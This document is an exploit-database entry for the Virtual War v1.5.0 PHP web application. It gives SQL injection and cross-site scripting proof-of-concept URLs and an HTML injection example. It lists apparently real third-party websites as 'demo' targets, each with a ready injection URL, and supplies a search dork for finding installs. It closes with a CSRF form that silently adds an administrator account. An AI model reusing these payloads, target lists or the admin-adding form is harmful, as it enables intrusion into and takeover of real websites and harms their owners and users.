Virtual War v1.5.0 Multiple Vulnerabilities

2012-04-01T00:00:00
ID 1337DAY-ID-17915
Type zdt
Reporter DoSs-Dz
Modified 2012-04-01T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            #===========================[!Expl0!Ts!]====================================#
#  [»]  ---> Script :   vwar150r15                                                                                                                #     
#  [»]  ---> Exploit Title : Multiple Exploit (SQL/Xss/Html Code injection/CSRF add admin)                                #
#  [»]  ---> Date :     4- 01- 2012                                                                                                                #
#  [»]  ---> Author :    Expl0!Ts                                                                                                                   #
#  [»]  ---> Software Link : http://www.vwar.de/download/vwar150r15.zip                                                     #                                                     
#  [»]  ---> Category:  php                                                                                                                          #
#  [»]  ---> Tested on:  wind xp & ubuntu 10.10                                                                                            #
#  [»]  ---> Dork : inurl:"/vwar/war.php"                                                                                                      #           
#===========================[!Expl0!Ts!]====================================#


First Bug iTs Sql :
===========================================================================================================================
1--> #==[!Vuln p0c <Sql Injection>!]==#

     http://127.0.0.1/<PATH>/vwar/war.php?showgame=1[Sql = ' ]&showgametype=1&showmatchtype=1&sortby=oppname&sortorder=desc

2--> #==[!Demo Site <Sql Injection>!]==#


      http://xtraold.com/vwar/war.php?showgame=1%27&showgametype=1&showmatchtype=1&sortby=oppname&sortorder=desc <:- [ SQl ]

      http://www.pafbase.us/vwar/war.php?showgame=1%27&showgametype=1&showmatchtype=1&sortby=oppname&sortorder=desc <:- [ SQl ]

      http://www.raf-hq.com/vwar/war.php?showgame=1%27&showgametype=1&showmatchtype=1&sortby=oppname&sortorder=desc <:- [ SQl ]
============================================================================================================================
Secnd Bug iTs Xss :


1--> #==[!Vuln p0c <Xss>!]==#

     http://127.0.0.1/gu/vwar/war.php?userlanguage= <:- [ XSS ]
     <script>alert("XSS");</script>


2--> #==[!Demo Site <Xss>!]==#

    http://www.d2sclan.co.uk/webby/vwar/war.php?userlanguage=%3Cscript%3Ealert%281%29;%3C/script%3E <:- [ XSS ]

    http://www.bfk.clanservers.com/vwar/war.php?userlanguage=%3Cscript%3Ealert%281%29;%3C/script%3E <:- [ XSS ]

    http://www.eaa-clan.com/vwar/war.php?userlanguage=%3Cscript%3Ealert%281%29;%3C/script%3E <:- [ XSS ]

    http://q2a.hajas.org/vwar/war.php?userlanguage=%3Cscript%3Ealert%281%29;%3C/script%3E <:- [ XSS ]
 
    http://www.1stcav.pl/vwar/calendar.php?action=list&month=4&year=%27%22%28%29%26%251%3CScRiPt%20%3Eprompt%28980985%29%3C%2fScRiPt%3E <:- [ XSS ]

    http://www.bbc-clan.co.uk//vwar/calendar.php?action=list&month=4&year=%27%22%28%29%26%251%3CScRiPt%20%3Eprompt%28980985%29%3C%2fScRiPt%3E <:- [ XSS ]

3--> #==[!Demo Site <Html code injection>!]==#

   http://www.hornafinland.com/vwar/war.php?userlanguage=german&userlanguage=%3Ch1%3EHtml%20Code%20Injection%20%3C/h1%3E <:- [ Html Code Injection ]

4--> #==[!CSRF Add New Admin !]==#

  <H2> Vwar CSRF  Add Admin By : Expl0!Ts</H2>
<form method="POST" name="form0" action="http://<SERVER>/<PATH>/vwar/admin/member.php?action=addmember">
<input type="hidden" name="name" value="dzmen"/>     <=// change it
<input type="hidden" name="realname" value="dzmen"/>    <=// change it
<input type="hidden" name="password" value="dzmen"/>   <=// change it
<input type="hidden" name="email" value="[email protected]"/> <=// change it
<input type="hidden" name="homepage" value=""/>
<input type="hidden" name="country" value="dz"/>
<input type="hidden" name="language" value="danish"/>
<input type="hidden" name="status" value="2"/>
<input type="hidden" name="customstatus" value=""/>
<input type="hidden" name="add" value="Add this Member"/>
<input type="hidden" name="field[1]" value=""/>
</form>
</body>
</html>

#================[!Expl01t3d By : Expl0!Ts !]===================#
# Greets T0 : Damane2011 & BaC & black-id & robert m °0°...°0°                         #
# Exploit-db.com & 1337day.com & sec4ever.com & isecuri1y.org                          #
# vbspiders.com & v4-team.com & Dz4all.com                                                      #
#=====================================================#
./The EnD EnJoY o_O



#  0day.today [2018-04-01]  #